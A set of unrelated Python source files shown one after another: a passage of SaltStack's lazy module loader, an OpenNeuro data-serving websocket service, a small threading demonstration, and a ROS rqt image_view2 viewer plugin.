self.loaded_base_name = loaded_base_name
else:
self.loaded_base_name = LOADED_BASE_NAME
self.mod_type_check = mod_type_check or _mod_type
if "__context__" not in self.pack:
self.pack["__context__"] = None
for k, v in self.pack.items():
if v is None: # if the value of a pack is None, lets make an empty dict
self.context_dict.setdefault(k, {})
self.pack[k] = salt.utils.context.NamespacedDictWrapper(
self.context_dict, k
)
self.whitelist = whitelist
self.virtual_enable = virtual_enable
self.initial_load = True
# names of modules that we don't have (errors, __virtual__, etc.)
self.missing_modules = {} # mapping of name -> error
self.loaded_modules = {} # mapping of module_name -> dict_of_functions
self.loaded_files = set() # TODO: just remove them from file_mapping?
self.static_modules = static_modules if static_modules else []
if virtual_funcs is None:
virtual_funcs = []
self.virtual_funcs = virtual_funcs
self.extra_module_dirs = extra_module_dirs if extra_module_dirs else []
self._clean_module_dirs = []
self.disabled = set(
self.opts.get(
"disable_{}{}".format(self.tag, "" if self.tag[-1] == "s" else "s"), [],
)
)
# A map of suffix to description for imp
self.suffix_map = {}
# A list to determine precedence of extensions
# Prefer packages (directories) over modules (single files)!
self.suffix_order = [""]
for (suffix, mode, kind) in SUFFIXES:
self.suffix_map[suffix] = (suffix, mode, kind)
self.suffix_order.append(suffix)
self._lock = threading.RLock()
with self._lock:
self._refresh_file_mapping()
super().__init__() # late init the lazy loader
# create all of the import namespaces
_generate_module("{}.int".format(self.loaded_base_name))
_generate_module("{}.int.{}".format(self.loaded_base_name, tag))
_generate_module("{}.ext".format(self.loaded_base_name))
_generate_module("{}.ext.{}".format(self.loaded_base_name, tag))
def clean_modules(self):
"""
Clean modules
"""
for name in list(sys.modules):
if name.startswith(self.loaded_base_name):
del sys.modules[name]
def __getitem__(self, item):
"""
Override the __getitem__ in order to decorate the returned function if we need
to last-minute inject globals
"""
func = super().__getitem__(item)
return LoadedFunc(func, self)
def __getattr__(self, mod_name):
"""
Allow for "direct" attribute access-- this allows jinja templates to
access things like `salt.test.ping()`
"""
if mod_name in ("__getstate__", "__setstate__"):
return object.__getattribute__(self, mod_name)
# if we have an attribute named that, lets return it.
try:
return object.__getattr__(self, mod_name) # pylint: disable=no-member
except AttributeError:
pass
# otherwise we assume its jinja template access
if mod_name not in self.loaded_modules and not self.loaded:
for name in self._iter_files(mod_name):
if name in self.loaded_files:
continue
# if we got what we wanted, we are done
if self._load_module(name) and mod_name in self.loaded_modules:
break
if mod_name in self.loaded_modules:
return LoadedMod(self.loaded_modules[mod_name], self)
else:
raise AttributeError(mod_name)
def missing_fun_string(self, function_name):
"""
Return the error string for a missing function.
This can range from "not available' to "__virtual__" returned False
"""
mod_name = function_name.split(".")[0]
if mod_name in self.loaded_modules:
return "'{}' is not available.".format(function_name)
else:
try:
reason = self.missing_modules[mod_name]
except KeyError:
return "'{}' is not available.".format(function_name)
else:
if reason is not None:
return "'{}' __virtual__ returned False: {}".format(
mod_name, reason
)
else:
return "'{}' __virtual__ returned False".format(mod_name)
def _refresh_file_mapping(self):
"""
refresh the mapping of the FS on disk
"""
# map of suffix to description for imp
if (
self.opts.get("cython_enable", True) is True
and ".pyx" not in self.suffix_map
):
try:
global pyximport
pyximport = __import__("pyximport") # pylint: disable=import-error
pyximport.install()
# add to suffix_map so file_mapping will pick it up
self.suffix_map[".pyx"] = tuple()
if ".pyx" not in self.suffix_order:
self.suffix_order.append(".pyx")
except ImportError:
log.info(
"Cython is enabled in the options but not present "
"in the system path. Skipping Cython modules."
)
# Allow for zipimport of modules
if (
self.opts.get("enable_zip_modules", True) is True
and ".zip" not in self.suffix_map
):
self.suffix_map[".zip"] = tuple()
if ".zip" not in self.suffix_order:
self.suffix_order.append(".zip")
# allow for module dirs
self.suffix_map[""] = ("", "", MODULE_KIND_PKG_DIRECTORY)
# create mapping of filename (without suffix) to (path, suffix)
# The files are added in order of priority, so order *must* be retained.
self.file_mapping = salt.utils.odict.OrderedDict()
opt_match = []
def _replace_pre_ext(obj):
"""
Hack so we can get the optimization level that we replaced (if
any) out of the re.sub call below. We use a list here because
it is a persistent data structure that we will be able to
access after re.sub is called.
"""
opt_match.append(obj)
return ""
for mod_dir in self.module_dirs:
try:
# Make sure we have a sorted listdir in order to have
# expectable override results
files = sorted(x for x in os.listdir(mod_dir) if x != "__pycache__")
except OSError:
continue # Next mod_dir
try:
pycache_files = [
os.path.join("__pycache__", x)
for x in sorted(os.listdir(os.path.join(mod_dir, "__pycache__")))
]
except OSError:
pass
else:
files.extend(pycache_files)
for filename in files:
try:
dirname, basename = os.path.split(filename)
if basename.startswith("_"):
# skip private modules
# log messages omitted for obviousness
continue # Next filename
f_noext, ext = os.path.splitext(basename)
f_noext = PY3_PRE_EXT.sub(_replace_pre_ext, f_noext)
try:
opt_level = int(opt_match.pop().group(1).rsplit("-", 1)[-1])
except (AttributeError, IndexError, ValueError):
# No regex match or no optimization level matched
opt_level = 0
try:
opt_index = self.opts["optimization_order"].index(opt_level)
except KeyError:
log.trace(
"Disallowed optimization level %d for module "
"name '%s', skipping. Add %d to the "
"'optimization_order' config option if you "
"do not want to ignore this optimization "
"level.",
opt_level,
f_noext,
opt_level,
)
continue
# make sure it is a suffix we support
if ext not in self.suffix_map:
continue # Next filename
if f_noext in self.disabled:
log.trace(
"Skipping %s, it is disabled by configuration", filename
)
continue # Next filename
fpath = os.path.join(mod_dir, filename)
# if its a directory, lets allow us to load that
if ext == "":
# is there something __init__?
subfiles = os.listdir(fpath)
for suffix in self.suffix_order:
if "" == suffix:
continue # Next suffix (__init__ must have a suffix)
init_file = "__init__{}".format(suffix)
if init_file in subfiles:
break
else:
continue # Next filename
try:
curr_ext = self.file_mapping[f_noext][1]
curr_opt_index = self.file_mapping[f_noext][2]
except KeyError:
pass
else:
if "" in (curr_ext, ext) and curr_ext != ext:
log.error(
"Module/package collision: '%s' and '%s'",
fpath,
self.file_mapping[f_noext][0],
)
if six.PY3 and ext == ".pyc" and curr_ext == ".pyc":
# Check the optimization level
if opt_index >= curr_opt_index:
# Module name match, but a higher-priority
# optimization level was already matched, skipping.
continue
elif not curr_ext or self.suffix_order.index(
ext
) >= self.suffix_order.index(curr_ext):
# Match found but a higher-priorty match already
# exists, so skip this.
continue
if six.PY3 and not dirname and ext == ".pyc":
# On Python 3, we should only load .pyc files from the
# __pycache__ subdirectory (i.e. when dirname is not an
# empty string).
continue
# Made it this far - add it
self.file_mapping[f_noext] = (fpath, ext, opt_index)
except OSError:
continue
for smod in self.static_modules:
f_noext = smod.split(".")[-1]
self.file_mapping[f_noext] = (smod, ".o", 0)
def clear(self):
"""
Clear the dict
"""
with self._lock:
super().clear() # clear the lazy loader
self.loaded_files = set()
self.missing_modules = {}
self.loaded_modules = {}
# if we have been loaded before, lets clear the file mapping since
# we obviously want a re-do
if hasattr(self, "opts"):
self._refresh_file_mapping()
self.initial_load = False
def __prep_mod_opts(self, opts):
"""
Strip out of the opts any logger instance
"""
if "__grains__" not in self.pack:
grains = opts.get("grains", {})
if isinstance(grains, salt.loader_context.NamedLoaderContext):
grains = grains.value()
self.context_dict["grains"] = grains
self.pack["__grains__"] = salt.utils.context.NamespacedDictWrapper(
self.context_dict, "grains"
)
if "__pillar__" not in self.pack:
pillar = opts.get("pillar", {})
if isinstance(pillar, salt.loader_context.NamedLoaderContext):
pillar = pillar.value()
self.context_dict["pillar"] = pillar
self.pack["__pillar__"] = salt.utils.context.NamespacedDictWrapper(
self.context_dict, "pillar"
)
mod_opts = {}
for key, val in list(opts.items()):
if key == "logger":
continue
mod_opts[key] = val
return mod_opts
def _iter_files(self, mod_name):
"""
Iterate over all file_mapping files in order of closeness to mod_name
"""
# do we have an exact match?
if mod_name in self.file_mapping:
yield mod_name
# do we have a partial match?
for k in self.file_mapping:
if mod_name in k:
yield k
# anyone else? Bueller?
for k in self.file_mapping:
if mod_name not in k:
yield k
def _reload_submodules(self, mod):
submodules = (
getattr(mod, sname)
for sname in dir(mod)
if isinstance(getattr(mod, sname), mod.__class__)
)
# reload only custom "sub"modules
for submodule in submodules:
# it is a submodule if the name is in a namespace under mod
if submodule.__name__.startswith(mod.__name__ + "."):
reload_module(submodule)
self._reload_submodules(submodule)
def __populate_sys_path(self):
for directory in self.extra_module_dirs:
if directory not in sys.path:
sys.path.append(directory)
self._clean_module_dirs.append(directory)
def __clean_sys_path(self):
invalidate_path_importer_cache = False
for directory in self._clean_module_dirs:
if directory in sys.path:
sys.path.remove(directory)
invalidate_path_importer_cache = True
self._clean_module_dirs = []
# Be sure that sys.path_importer_cache do not contains any
# invalid FileFinder references
importlib.invalidate_caches()
# Because we are mangling with importlib, we can find from
# time to time an invalidation issue with
# sys.path_importer_cache, that requires the removal of
# FileFinder that remain None for the extra_module_dirs
if invalidate_path_importer_cache:
for directory in self.extra_module_dirs:
if (
directory in sys.path_importer_cache
and sys.path_importer_cache[directory] is None
):
del sys.path_importer_cache[directory]
def _load_module(self, name):
mod = None
fpath, suffix = self.file_mapping[name][:2]
# if the fpath has `.cpython-3x` in it, but the running Py version
# is 3.y, the following will cause us to return immediately and we won't try to import this .pyc.
# This is for the unusual case where several Python versions share a single
# source tree and drop their .pycs in the same __pycache__ folder.
# If we were to load a .pyc for another Py version it's not a big problem
# but the log will get spammed with "Bad Magic Number" messages that
# can be very misleading if the user is debugging another problem.
try:
(implementation_tag, cache_tag_ver) = sys.implementation.cache_tag.split(
"-"
)
if cache_tag_ver not in fpath and implementation_tag in fpath:
log.trace(
"Trying to load %s on %s, returning False.",
fpath,
sys.implementation.cache_tag,
)
return False
except AttributeError:
# Most likely Py 2.7 or some other Python version we don't really support
pass
self.loaded_files.add(name)
fpath_dirname = os.path.dirname(fpath)
try:
self.__populate_sys_path()
sys.path.append(fpath_dirname)
if suffix == ".pyx":
mod = pyximport.load_module(name, fpath, tempfile.gettempdir())
elif suffix == ".o":
top_mod = __import__(fpath, globals(), locals(), [])
comps = fpath.split(".")
if len(comps) < 2:
mod = top_mod
else:
mod = top_mod
for subname in comps[1:]:
mod = getattr(mod, subname)
elif suffix == ".zip":
mod = zipimporter(fpath).load_module(name)
else:
desc = self.suffix_map[suffix]
# if it is a directory, we don't open a file
try:
mod_namespace = ".".join(
(
self.loaded_base_name,
self.mod_type_check(fpath),
self.tag,
name,
)
)
except TypeError:
mod_namespace = "{}.{}.{}.{}".format(
self.loaded_base_name,
self.mod_type_check(fpath),
self.tag,
name,
)
if suffix == "":
# pylint: disable=no-member
# Package directory, look for __init__
loader_details = [
(
importlib.machinery.SourceFileLoader,
importlib.machinery.SOURCE_SUFFIXES,
),
(
importlib.machinery.SourcelessFileLoader,
importlib.machinery.BYTECODE_SUFFIXES,
),
(
importlib.machinery.ExtensionFileLoader,
importlib.machinery.EXTENSION_SUFFIXES,
),
]
file_finder = importlib.machinery.FileFinder(
fpath_dirname, *loader_details
)
spec = file_finder.find_spec(mod_namespace)
if spec is None:
raise ImportError()
# TODO: Get rid of load_module in favor of
# exec_module below. load_module is deprecated, but
# loading using exec_module has been causing odd things
# with the magic dunders we pack into the loaded
# modules, most notably with salt-ssh's __opts__.
mod = spec.loader.load_module()
# mod = importlib.util.module_from_spec(spec)
# spec.loader.exec_module(mod)
# pylint: enable=no-member
sys.modules[mod_namespace] = mod
# reload all submodules if necessary
if not self.initial_load:
self._reload_submodules(mod)
else:
# pylint: disable=no-member
loader = MODULE_KIND_MAP[desc[2]](mod_namespace, fpath)
spec = importlib.util.spec_from_file_location(
mod_namespace, fpath, loader=loader
)
if spec is None:
raise ImportError()
# TODO: Get rid of load_module in favor of
# exec_module below. load_module is deprecated, but
# loading using exec_module has been causing odd things
# with the magic dunders we pack into the loaded
# modules, most notably with salt-ssh's __opts__.
mod = self.run(spec.loader.load_module)
# mod = importlib.util.module_from_spec(spec)
# spec.loader.exec_module(mod)
# pylint: enable=no-member
sys.modules[mod_namespace] = mod
except OSError:
raise
except ImportError as exc:
if "magic number" in str(exc):
error_msg = "Failed to import {} {}. Bad magic number. If migrating from Python2 to Python3, remove all .pyc files and try again.".format(
self.tag, name
)
log.warning(error_msg)
self.missing_modules[name] = error_msg
log.debug("Failed to import %s %s:\n", self.tag, name, exc_info=True)
self.missing_modules[name] = exc
return False
except Exception as error: # pylint: disable=broad-except
log.error(
"Failed to import %s %s, this is due most likely to a "
"syntax error:\n",
self.tag,
name,
exc_info=True,
)
self.missing_modules[name] = error
return False
except SystemExit as error:
try:
fn_, _, caller, _ = traceback.extract_tb(sys.exc_info()[2])[-1]
except Exception: # pylint: disable=broad-except
pass
else:
tgt_fn = os.path.join("salt", "utils", "process.py")
if fn_.endswith(tgt_fn) and "_handle_signals" in caller:
# Race conditon, SIGTERM or SIGINT received while loader
# was in process of loading a module. Call sys.exit to
# ensure that the process is killed.
sys.exit(salt.defaults.exitcodes.EX_OK)
log.error(
"Failed to import %s %s as the module called exit()\n",
self.tag,
name,
exc_info=True,
)
self.missing_modules[name] = error
return False
finally:
sys.path.remove(fpath_dirname)
self.__clean_sys_path()
loader_context = salt.loader_context.LoaderContext()
if hasattr(mod, "__salt_loader__"):
if not isinstance(mod.__salt_loader__, salt.loader_context.LoaderContext):
log.warning("Override __salt_loader__: %s", mod)
mod.__salt_loader__ = loader_context
else:
mod.__salt_loader__ = loader_context
if hasattr(mod, "__opts__"):
if not isinstance(mod.__opts__, salt.loader_context.NamedLoaderContext):
if not hasattr(mod, "__orig_opts__"):
mod.__orig_opts__ = copy.deepcopy(mod.__opts__)
mod.__opts__ = copy.deepcopy(mod.__orig_opts__)
mod.__opts__.update(self.opts)
else:
if not hasattr(mod, "__orig_opts__"):
mod.__orig_opts__ = {}
mod.__opts__ = copy.deepcopy(mod.__orig_opts__)
mod.__opts__.update(self.opts)
# pack whatever other globals we were asked to
for p_name, p_value in self.pack.items():
mod_named_context = getattr(mod, p_name, None)
if hasattr(mod_named_context, "default"):
default = copy.deepcopy(mod_named_context.default)
else:
default = None
named_context = loader_context.named_context(p_name, default)
if mod_named_context is None:
setattr(mod, p_name, named_context)
elif named_context != mod_named_context:
log.debug("Override %s: %s", p_name, mod)
setattr(mod, p_name, named_context)
else:
setattr(mod, p_name, named_context)
if self.pack_self is not None:
mod_named_context = getattr(mod, self.pack_self, None)
if hasattr(mod_named_context, "default"):
default = copy.deepcopy(mod_named_context.default)
else:
default = None
named_context = loader_context.named_context(self.pack_self, default)
if mod_named_context is None:
setattr(mod, self.pack_self, named_context)
elif named_context != mod_named_context:
log.debug("Override %s: %s", self.pack_self, mod)
setattr(mod, self.pack_self, named_context)
else:
setattr(mod, self.pack_self, named_context)
module_name = mod.__name__.rsplit(".", 1)[-1]
# Call a module's initialization method if it exists
module_init = getattr(mod, "__init__", None)
if inspect.isfunction(module_init):
try:
self.run(module_init, self.opts)
except TypeError as e:
log.error(e)
except Exception: # pylint: disable=broad-except
err_string = "__init__ failed"
log.debug(
"Error loading %s.%s: %s",
self.tag,
module_name,
err_string,
exc_info=True,
)
self.missing_modules[module_name] = err_string
self.missing_modules[name] = err_string
return False
# if virtual modules are enabled, we need to look for the
# __virtual__() function inside that module and run it.
if self.virtual_enable:
virtual_funcs_to_process = ["__virtual__"] + self.virtual_funcs
for virtual_func in virtual_funcs_to_process:
(
virtual_ret,
module_name,
virtual_err,
virtual_aliases,
) = self._process_virtual(mod, module_name, virtual_func)
if virtual_err is not None:
log.trace(
"Error loading %s.%s: %s", self.tag, module_name, virtual_err
)
# if _process_virtual returned a non-True value then we are
# supposed to not process this module
if virtual_ret is not True and module_name not in self.missing_modules:
# If a module has information about why it could not be loaded, record it
self.missing_modules[module_name] = virtual_err
self.missing_modules[name] = virtual_err
return False
else:
virtual_aliases = ()
# If this is a proxy minion then MOST modules cannot work. Therefore, require that
# any module that does work with salt-proxy-minion define __proxyenabled__ as a list
# containing the names of the proxy types that the module supports.
#
# Render modules and state modules are OK though
if "proxy" in self.opts:
if self.tag in ["grains", "proxy"]:
if not hasattr(mod, "__proxyenabled__") or (
self.opts["proxy"]["proxytype"] not in mod.__proxyenabled__
and "*" not in mod.__proxyenabled__
):
err_string = "not a proxy_minion enabled module"
self.missing_modules[module_name] = err_string
self.missing_modules[name] = err_string
return False
if getattr(mod, "__load__", False) is not False:
log.info(
"The functions from module '%s' are being loaded from the "
"provided __load__ attribute",
module_name,
)
# If we had another module by the same virtual name, we should put any
# new functions under the existing dictionary.
mod_names = [module_name] + list(virtual_aliases)
mod_dict = {
x: self.loaded_modules.get(x, self.mod_dict_class()) for x in mod_names
}
for attr in getattr(mod, "__load__", dir(mod)):
if attr.startswith("_"):
# private functions are skipped
continue
func = getattr(mod, attr)
if not inspect.isfunction(func) and not isinstance(func, functools.partial):
# Not a function!? Skip it!!!
continue
# Let's get the function name.
# If the module has the __func_alias__ attribute, it must be a
# dictionary mapping in the form of(key -> value):
# <real-func-name> -> <desired-func-name>
#
# It default's of course to the found callable attribute name
# if no alias is defined.
funcname = getattr(mod, "__func_alias__", {}).get(attr, attr)
for tgt_mod in mod_names:
try:
full_funcname = ".".join((tgt_mod, funcname))
except TypeError:
full_funcname = "{}.{}".format(tgt_mod, funcname)
# Save many references for lookups
# Careful not to overwrite existing (higher priority) functions
if full_funcname not in self._dict:
self._dict[full_funcname] = func
if funcname not in mod_dict[tgt_mod]:
setattr(mod_dict[tgt_mod], funcname, func)
mod_dict[tgt_mod][funcname] = func
self._apply_outputter(func, mod)
# enforce depends
try:
Depends.enforce_dependencies(self._dict, self.tag, name)
except RuntimeError as exc:
log.info(
"Depends.enforce_dependencies() failed for the following " "reason: %s",
exc,
)
for tgt_mod in mod_names:
self.loaded_modules[tgt_mod] = mod_dict[tgt_mod]
return True
def _load(self, key):
"""
Load a single item if you have it
"""
# if the key doesn't have a '.' then it isn't valid for this mod dict
if not isinstance(key, str):
raise KeyError("The key must be a string.")
if "." not in key:
raise KeyError("The key '{}' should contain a '.'".format(key))
mod_name, _ = key.split(".", 1)
with self._lock:
# It is possible that the key is in the dictionary after
# acquiring the lock due to another thread loading it.
if mod_name in self.missing_modules or key in self._dict:
return True
# if the modulename isn't in the whitelist, don't bother
if self.whitelist and mod_name not in self.whitelist:
log.error(
"Failed to load function %s because its module (%s) is "
"not in the whitelist: %s",
key,
mod_name,
self.whitelist,
)
raise KeyError(key)
def _inner_load(mod_name):
for name in self._iter_files(mod_name):
if name in self.loaded_files:
continue
# if we got what we wanted, we are done
if self._load_module(name) and key in self._dict:
return True
return False
# try to load the module
ret = None
reloaded = False
# re-scan up to once, IOErrors or a failed load cause re-scans of the
# filesystem
while True:
try:
ret = _inner_load(mod_name)
if not reloaded and ret is not True:
self._refresh_file_mapping()
reloaded = True
continue
break
except OSError:
if not reloaded:
self._refresh_file_mapping()
reloaded = True
continue
return ret
def _load_all(self):
"""
Load all of them
"""
with self._lock:
for name in self.file_mapping:
if name in self.loaded_files or name in self.missing_modules:
continue
self._load_module(name)
self.loaded = True
def reload_modules(self):
with self._lock:
self.loaded_files = set()
self._load_all()
def _apply_outputter(self, func, mod):
"""
Apply the __outputter__ variable to the functions
"""
if hasattr(mod, "__outputter__"):
outp = mod.__outputter__
if func.__name__ in outp:
func.__outputter__ = outp[func.__name__]
def _process_virtual(self, mod, module_name, virtual_func="__virtual__"):
"""
Given a loaded module and its default name determine its virtual name
This function returns a tuple. The first value will be either True or
False and will indicate if the module should be loaded or not (i.e. if
it threw and exception while processing its __virtual__ function). The
second value is the determined virtual name, which may be the same as
the value provided.
The default name can be calculated as follows::
module_name = mod.__name__.rsplit('.', 1)[-1]
"""
# The __virtual__ function will return either a True or False value.
# If it returns a True value it can also set a module level attribute
# named __virtualname__ with the name that the module should be
# referred to as.
#
# This allows us to have things like the pkg module working on all
# platforms under the name 'pkg'. It also allows for modules like
# augeas_cfg to be referred to as 'augeas', which would otherwise have
# namespace collisions. And finally it allows modules to return False
# if they are not intended to run on the given platform or are missing
# dependencies.
virtual_aliases = getattr(mod, "__virtual_aliases__", tuple())
try:
error_reason = None
if hasattr(mod, "__virtual__") and inspect.isfunction(mod.__virtual__):
try:
start = time.time()
virtual_attr = getattr(mod, virtual_func)
virtual = self.run(virtual_attr)
if isinstance(virtual, tuple):
error_reason = virtual[1]
virtual = virtual[0]
if self.opts.get("virtual_timer", False):
end = time.time() - start
msg = "Virtual function took {} seconds for {}".format(
end, module_name
)
log.warning(msg)
except Exception as exc: # pylint: disable=broad-except
error_reason = (
"Exception raised when processing __virtual__ function"
" for {}. Module will not be loaded: {}".format(
mod.__name__, exc
)
)
log.error(error_reason, exc_info_on_loglevel=logging.DEBUG)
virtual = None
# Get the module's virtual name
virtualname = getattr(mod, "__virtualname__", virtual)
if not virtual:
# if __virtual__() evaluates to False then the module
# wasn't meant for this platform or it's not supposed to
# load for some other reason.
# Some modules might accidentally return None and are
# improperly loaded
if virtual is None:
log.warning(
"%s.__virtual__() is wrongly returning `None`. "
"It should either return `True`, `False` or a new "
"name. If you're the developer of the module "
"'%s', please fix this.",
mod.__name__,
module_name,
)
return (False, module_name, error_reason, virtual_aliases)
# At this point, __virtual__ did not return a
# boolean value, let's check for deprecated usage
# or module renames
if virtual is not True and module_name != virtual:
# The module is renaming itself. Updating the module name
# with the new name
log.trace("Loaded %s as virtual %s", module_name, virtual)
if virtualname != virtual:
# The __virtualname__ attribute does not match what's
# being returned by the __virtual__() function. This
# should be considered an error.
log.error(
"The module '%s' is showing some bad usage. Its "
"__virtualname__ attribute is set to '%s' yet the "
"__virtual__() function is returning '%s'. These "
"values should match!",
mod.__name__,
virtualname,
virtual,
)
module_name = virtualname
# If the __virtual__ function returns True and __virtualname__
# is set then use it
elif virtual is True and virtualname != module_name:
if virtualname is not True:
module_name = virtualname
except KeyError:
# Key errors come out of the virtual function when passing
# in incomplete grains sets, these can be safely ignored
# and logged to debug, still, it includes the traceback to
# help debugging.
log.debug("KeyError when loading %s", module_name, exc_info=True)
except Exception: # pylint: disable=broad-except
# If the module throws an exception during __virtual__()
# then log the information and continue to the next.
log.error(
"Failed to read the virtual function for %s: %s",
self.tag,
module_name,
exc_info=True,
)
return (False, module_name, error_reason, virtual_aliases)
return (True, module_name, None, virtual_aliases)
def run(self, _func_or_method, *args, **kwargs):
"""
Run the `_func_or_method` in this loader's context
"""
self._last_context = contextvars.copy_context()
return self._last_context.run(self._run_as, _func_or_method, *args, **kwargs)
def _run_as(self, _func_or_method, *args, **kwargs):
"""
Handle setting up the context properly and call the method
"""
self.parent_loader = None
try:
current_loader = salt.loader_context.loader_ctxvar.get()
except LookupError:
current_loader = None
if current_loader is not self:
self.parent_loader = current_loader
token = salt.loader_context.loader_ctxvar.set(self)
try:
return _func_or_method(*args, **kwargs)
finally:
self.parent_loader = None
salt.loader_context.loader_ctxvar.reset(token)
def run_in_thread(self, _func_or_method, *args, **kwargs):
"""
Run the function in a new thread with the context of this loader
"""
argslist = [self, _func_or_method]
argslist.extend(args)
thread = threading.Thread(target=self.target, args=argslist, kwargs=kwargs)
thread.start()
return thread
@staticmethod
def target(loader, _func_or_method, *args, **kwargs):
loader.run(_func_or_method, *args, **kwargs)
def global_injector_decorator(inject_globals):
"""
Decorator used by the LazyLoader to inject globals into a function at
execute time.
globals
Dictionary with global variables to inject
"""
def inner_decorator(f):
@functools.wraps(f)
def wrapper(*args, **kwargs):
with salt.utils.context.func_globals_inject(f, **inject_globals):
return f(*args, **kwargs)
return wrapper
return inner_decorator
|
openNeuroService.py
|
"""
A command-line service to be run where the OpenNeuro data is downloaded and cached.
This service instantiates a BidsInterface object for serving the data back to the client
running in the cloud. It connects to the remote projectServer.
Once a connection is established it waits for requets and invokes the BidsInterface
functions to handle them.
"""
import os
import logging
import threading
from rtCommon.bidsInterface import BidsInterface
from rtCommon.wsRemoteService import WsRemoteService, parseConnectionArgs
from rtCommon.utils import installLoggers
class OpenNeuroService:
"""
A class that implements the OpenNeuroService by instantiating a BidsInterface, connecting
to the remote projectServer and servicing requests to the BidsInterface.
"""
def __init__(self, args, webSocketChannelName='wsData'):
"""
Uses the WsRemoteService framework to parse connection-related args and establish
a connection to a remote projectServer. Instantiates a local version of BidsInterface
to handle client requests coming from the projectServer connection.
Args:
args: Argparse args related to connecting to the remote server. These include
"-s <server>", "-u <username>", "-p <password>", "--test",
"-i <retry-connection-interval>"
webSocketChannelName: The websocket url extension used to connecy and communicate
to the remote projectServer, e.g. 'wsData' would connect to 'ws://server:port/wsData'
"""
# Not necessary to set the allowedDirs for BidsInterface here becasue we won't be
# using the DicomToBidsStream interface, leave it as none allowed (default)
self.bidsInterface = BidsInterface(dataRemote=False)
self.wsRemoteService = WsRemoteService(args, webSocketChannelName)
self.wsRemoteService.addHandlerClass(BidsInterface, self.bidsInterface)
def runDetached(self):
"""Starts the receiver in it's own thread."""
self.recvThread = threading.Thread(name='recvThread',
target=self.wsRemoteService.runForever)
self.recvThread.setDaemon(True)
self.recvThread.start()
if __name__ == "__main__":
installLoggers(logging.INFO, logging.INFO, filename='logs/OpenNeuroService.log')
# parse connection args
connectionArgs = parseConnectionArgs()
try:
openNeuroService = OpenNeuroService(connectionArgs)
# Use this command to run the service and not return control
openNeuroService.wsRemoteService.runForever()
# Alternately use this command to start the service in a thread and
# return control to main.
# openNeuroService.runDetached()
except Exception as err:
print(f'Exception: {err}')
|
threading_global_1.py
|
#!/usr/bin/env python3
import threading
import time
import random
mylist = [ ]
def hello(n):
time.sleep(random.randint(1,3))
mylist.append(threading.get_ident()) # bad in real code!
print("[{0}] Hello!".format(n))
threads = [ ]
for i in range(10):
t = threading.Thread(target=hello, args=(i,))
threads.append(t)
t.start()
for one_thread in threads:
one_thread.join()
print("Done!")
print(len(mylist))
print(mylist)
|
image_view2_wrapper.py
|
from rqt_gui_py.plugin import Plugin
import python_qt_binding.QtGui as QtGui
from python_qt_binding.QtGui import (QAction, QIcon, QMenu, QWidget,
QPainter, QColor, QFont, QBrush,
QPen, QMessageBox, QSizePolicy,
QImage, QPixmap, qRgb, QComboBox,
QDialog, QPushButton)
from python_qt_binding.QtCore import (Qt, QTimer, qWarning, Slot,
QEvent, QSize, pyqtSignal,
pyqtSlot)
from threading import Lock, Thread
import rospy
import python_qt_binding.QtCore as QtCore
from std_msgs.msg import Bool, Time
import time
import math
from resource_retriever import get_filename
import yaml
import os, sys
import numpy as np
import cv2, cv
from cv_bridge import CvBridge, CvBridgeError
from image_view2.msg import MouseEvent
from sensor_msgs.msg import Image
class ComboBoxDialog(QDialog):
def __init__(self, parent=None):
super(ComboBoxDialog, self).__init__()
self.number = 0
vbox = QtGui.QVBoxLayout(self)
self.combo_box = QComboBox(self)
self.combo_box.activated.connect(self.onActivated)
vbox.addWidget(self.combo_box)
button = QPushButton()
button.setText("Done")
button.clicked.connect(self.buttonCallback)
vbox.addWidget(button)
self.setLayout(vbox)
def buttonCallback(self, event):
self.close()
def onActivated(self, number):
self.number = number
class ImageView2Plugin(Plugin):
"""
rqt wrapper for image_view2
"""
def __init__(self, context):
super(ImageView2Plugin, self).__init__(context)
self.setObjectName("ImageView2Plugin")
self._widget = ImageView2Widget()
context.add_widget(self._widget)
def save_settings(self, plugin_settings, instance_settings):
self._widget.save_settings(plugin_settings, instance_settings)
def restore_settings(self, plugin_settings, instance_settings):
self._widget.restore_settings(plugin_settings, instance_settings)
def trigger_configuration(self):
self._widget.trigger_configuration()
class ScaledLabel(QtGui.QLabel):
def __init__(self, *args, **kwargs):
QtGui.QLabel.__init__(self)
self._pixmap = QtGui.QPixmap(self.pixmap())
def resizeEvent(self, event):
self.setPixmap(self._pixmap.scaled(
self.width(), self.height(),
QtCore.Qt.KeepAspectRatio))
class ImageView2Widget(QWidget):
"""
Qt widget to communicate with image_view2
"""
cv_image = None
pixmap = None
repaint_trigger = pyqtSignal()
def __init__(self):
super(ImageView2Widget, self).__init__()
self.left_button_clicked = False
self.repaint_trigger.connect(self.redraw)
self.lock = Lock()
self.need_to_rewrite = False
self.bridge = CvBridge()
self.image_sub = None
self.event_pub = None
self.label = ScaledLabel()
self.label.setAlignment(Qt.AlignCenter)
self.label.setSizePolicy(QSizePolicy(QSizePolicy.Ignored, QSizePolicy.Ignored))
#self.label.installEventFilter(self)
vbox = QtGui.QVBoxLayout(self)
vbox.addWidget(self.label)
self.setLayout(vbox)
self._image_topics = []
self._update_topic_thread = Thread(target=self.updateTopics)
self._update_topic_thread.start()
self._active_topic = None
self.setMouseTracking(True)
self.label.setMouseTracking(True)
self._dialog = ComboBoxDialog()
self.show()
def trigger_configuration(self):
self._dialog.exec_()
self.setupSubscriber(self._image_topics[self._dialog.number])
def setupSubscriber(self, topic):
if self.image_sub:
self.image_sub.unregister()
rospy.loginfo("Subscribing %s" % (topic + "/marked"))
self.image_sub = rospy.Subscriber(topic + "/marked",
Image,
self.imageCallback)
self.event_pub = rospy.Publisher(topic + "/event", MouseEvent)
self._active_topic = topic
def onActivated(self, number):
self.setupSubscriber(self._image_topics[number])
def imageCallback(self, msg):
with self.lock:
if msg.width == 0 or msg.height == 0:
rospy.logdebug("Looks input images is invalid")
return
cv_image = self.bridge.imgmsg_to_cv2(msg, msg.encoding)
if msg.encoding == "bgr8":
self.cv_image = cv2.cvtColor(cv_image, cv2.COLOR_BGR2RGB)
elif msg.encoding == "rgb8":
self.cv_image = cv_image
self.numpy_image = np.asarray(self.cv_image)
self.need_to_rewrite = True
self.repaint_trigger.emit()
def updateTopics(self):
need_to_update = False
for (topic, topic_type) in rospy.get_published_topics():
if topic_type == "sensor_msgs/Image":
with self.lock:
if not topic in self._image_topics:
self._image_topics.append(topic)
need_to_update = True
if need_to_update:
with self.lock:
self._image_topics = sorted(self._image_topics)
self._dialog.combo_box.clear()
for topic in self._image_topics:
self._dialog.combo_box.addItem(topic)
if self._active_topic:
self._dialog.combo_box.setCurrentIndex(self._image_topics.index(self._active_topic))
time.sleep(1)
